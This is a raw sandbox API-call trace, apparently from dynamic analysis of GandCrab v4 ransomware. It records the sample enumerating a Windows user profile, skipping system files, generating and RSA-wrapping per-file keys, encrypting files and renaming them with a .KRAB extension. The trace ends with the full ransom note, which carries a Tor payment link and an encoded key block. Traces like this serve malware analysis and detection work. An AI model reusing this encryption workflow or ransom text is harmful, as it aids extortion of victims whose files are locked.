pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.758] GetLastError () returned 0x0 [0094.758] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.758] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.758] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.758] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.761] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.762] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.762] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0094.762] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0094.762] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" [0094.762] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.762] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.KRAB") returned 119 [0094.762] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0094.762] lstrlenW (lpString=".regtrans-ms") returned 12 [0094.763] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.763] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0094.763] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.763] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0094.763] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0094.763] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0094.763] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0094.763] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0094.763] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntldr") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0094.764] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0094.764] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.764] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10114e0) returned 1 [0094.765] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.765] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.765] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.765] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.765] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0094.765] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.766] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010e80) returned 1 [0094.766] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.767] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.767] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.767] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.767] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0094.767] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.767] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x10112c0) returned 1 [0094.768] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd5a0) returned 1 [0094.768] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.768] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.768] GetLastError () returned 0x0 [0094.768] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0094.768] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0094.768] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011898) returned 1 [0094.768] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.769] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.769] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.769] GetLastError () returned 0x0 [0094.769] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.769] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.769] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.769] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.770] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.770] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.770] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0094.770] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0094.770] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" [0094.770] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.770] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini.KRAB") returned 37 [0094.770] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0094.771] lstrlenW (lpString=".ini") returned 4 [0094.771] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.771] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0094.771] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.771] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0094.771] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="desktop.ini") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="autorun.inf") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="iconcache.db") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootsect.bak") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot.ini") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat.log") returned 1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="thumbs.db") returned -1 [0094.771] lstrcmpiW (lpString1="ntuser.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0094.772] lstrcmpiW (lpString1="ntuser.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.772] lstrcmpiW (lpString1="ntuser.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.772] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntldr") returned 1 [0094.772] lstrcmpiW (lpString1="ntuser.ini", lpString2="NTDETECT.COM") returned 1 [0094.772] lstrcmpiW (lpString1="ntuser.ini", lpString2="Bootfont.bin") returned 1 [0094.772] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.772] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0094.772] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.773] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.773] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.773] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.773] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.773] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.773] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0094.774] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.774] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.775] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.775] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.775] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.775] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.775] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011018) returned 1 [0094.776] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd7a0) returned 1 [0094.776] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.776] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.776] GetLastError () returned 0x0 [0094.776] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.776] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0094.776] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011458) returned 1 [0094.777] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd920) returned 1 [0094.777] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.777] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.777] GetLastError () returned 0x0 [0094.777] CryptDestroyKey (hKey=0xfbd920) returned 1 [0094.777] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0094.777] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0094.778] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.778] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.779] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x14, lpOverlapped=0x0) returned 1 [0094.791] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.791] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x14, lpOverlapped=0x0) returned 1 [0094.791] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0094.792] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.803] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.804] CloseHandle (hObject=0x320) returned 1 [0094.804] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.804] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini.krab")) returned 1 [0094.805] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.811] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.811] lstrcmpW (lpString1="OneDrive", lpString2=".") returned 1 [0094.811] lstrcmpW (lpString1="OneDrive", lpString2="..") returned 1 [0094.811] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="OneDrive" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive" [0094.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\" [0094.812] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.815] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.815] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.815] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.815] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.815] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.815] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.816] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\\\KRAB-DECRYPT.txt") returned 48 [0094.816] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\onedrive\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0094.820] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.820] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, 